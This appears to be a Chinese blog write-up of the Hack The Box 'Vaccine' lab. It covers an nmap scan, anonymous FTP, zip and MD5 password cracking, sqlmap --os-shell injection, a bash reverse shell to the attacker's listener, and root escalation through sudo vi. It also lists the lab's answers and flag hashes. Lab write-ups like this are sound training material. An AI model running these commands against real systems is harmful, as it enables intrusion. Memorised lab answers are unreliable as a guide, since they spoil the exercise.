559 字
3 分钟
Hack the box Vaccine题解
在打靶机的时候网络有点问题,所以这份WP里的目标机器的IP前后是不一样的,但总的来说,方法大同小异
扫端口
nmap -sC -sV 10.129.252.99
开启了21、22和80端口,访问80端口,什么都没有,结合任务1和任务2,就直接练上去看有没有东西

ftp
连上以后把文件复制出来

破解zip密码
解压的时候发现是有密码的

看到任务4,和经过百度知道利用zip2john去获取压缩包的hash值,然后使用john去破解hash值

破解成功

backup的内容
得到了两个文件

其中index.php里面有网站的管理员账号和密码,密码经过了md5加密,经过破解得到:qwerty789,这也是任务5的答案


sql注入
登录到后台后有个搜索框尝试有无sql注入,发现可注入,加上任务6的提示,那就直接sqlmap一把梭

用burpsuite抓包保存到1.txt后,利用sqlmap进行注入,并利用--os-shell进行执行shell的命令

- 注入命令:
sqlmap -r 1.txt --os-shell反弹shell
- 攻击机监听
nc -lvvp 1234- 在
--os-shell里执行
bash -c "bash -i >& /dev/tcp/10.10.14.13/1234 0>&1"在网站的根目录下的dashboard.php里发现了数据库的一个账号的密码

账号:postgres密码:P@s5w0rd!提权
在前面的端口扫描里看到这台机器是开启了22端口的,尝试使用上面得到的账号密码去登陆(想要用这个是因为为反弹shell后并不稳定,老是掉线,所以就换另一个方法),可以成功登录
使用命令suo -l查看postgres能执行的高级权限的命令

发现有一个命令是:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf然后看官方的wp得知,可以利用vi进行提权
首先运行命令:sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf 输入
:切换命令模式输入:set shell=/bin/sh在按一次
:切换到命令模式输入:shell
然后就切换到了root用户

答案
- FTP
- anonymous
- backup.zip
- zip2john
- qwerty789
- —os-shell
- vi
- ec9b13ca4d6229cd5cc1e09980965bf7
- dd6e058e814260bc70e9bbdef2715849
参考博客
Hack the box Vaccine题解
https://blog.crzliang.cn/archives/28632/